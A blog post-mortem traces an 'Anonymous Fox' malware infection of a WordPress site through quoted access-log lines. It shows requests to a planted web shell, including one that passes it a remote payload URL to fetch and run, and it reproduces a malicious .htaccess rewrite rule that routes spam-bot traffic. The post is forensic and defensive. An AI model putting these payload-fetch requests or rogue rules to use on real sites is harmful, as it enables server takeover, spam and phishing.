WordPress “Anonymous Fox” virus port mortem

Here are notes from a malware investigation, of which I would later learn goes by "Anonymous Fox", the supposed pseudonym of the malware author.

Here's notes from the timeline:

Earliest logs

The logs begin at the end of August 2020, although unfortunately it's likely the compromise occurred earlier.

A successful request for a questionable sitemap from an IP I'd later learn was a bot IP

66.249.79.171 - - [31/Aug/2020:05:30:03 -0700] "GET /wp-sitemap-posts-post-1.xml HTTP/1.1" 200

A POST to xmlrpc.php
I'll be seeing more of this troublesome file - a standard part of WordPress core, frequently used to stage brute force password guessing attempts.

45.64.122.210 - - [31/Aug/2020:05:34:44 -0700] "POST /xmlrpc.php HTTP/2.0" 200 403

An IP from the bot range that pings the site to this day makes a strange request:

66.249.79.173 - - [31/Aug/2020:06:29:40 -0700] "GET /2020088296/

Post-compromise

Malware has definitely been installed at this point - there is no plugin "pp" nor script "mm.php" - in order for this to get a 200 response, they must already have been written to the server.

23.83.130.164 - - [31/Aug/2020:08:38:06 -0700] "GET /wordpress/wp-content/plugins/pp/mm.php HTTP/2.0" 200 1526

The second snippet is particularly telling, as the GET request has the server username in the request itself. Not good. It seems to send the site public root, preparing for the malware to ultimately sitemap the server in order to know where to install all it's public-facing goodies.

23.83.130.164 - - [31/Aug/2020:08:38:16 -0700] "GET /wordpress/wp-content/plugins/pp/mm.php?path=/home/[user]/public_html

And away we go - "Anonymous Fox". With it's very own public domain of hacking tools. The malware installation is setting up shop and approaches it's Final Form.

123.108.244.2 - - [02/Sep/2020:01:44:26 -0700] "GET /wordpress/wp-content/plugins/pp/dzfkubcdpg.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200

Let the botting commence

The first successful request to a bot endpoint. This would be followed by tens of thousands more over the course of the next 2 weeks.

77.88.5.32 - - [06/Sep/2020:19:00:16 -0700] "GET /soarsound/22150aghi10008549 HTTP/1.1" 200 8558

An .htaccess rule was written to parse these incoming requests to be ingested by the malware on site. At this point they have full i/o abilities so it would require time that I don't have to find out exactly what they were up to.

# BEGIN WordPress

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]

What exactly it was doing is hard to say, although it was communicating with one domain in another country most frequently. Anonymous Fox offers SMTP and Cpanel abilities in particular, most likely for mass spamming and phishing of sensitive data, using your server's IP as the "origin" IP so that you get shut down and traced eventually, not them.

Leave a Reply

Your email address will not be published. Required fields are marked *

oko
friend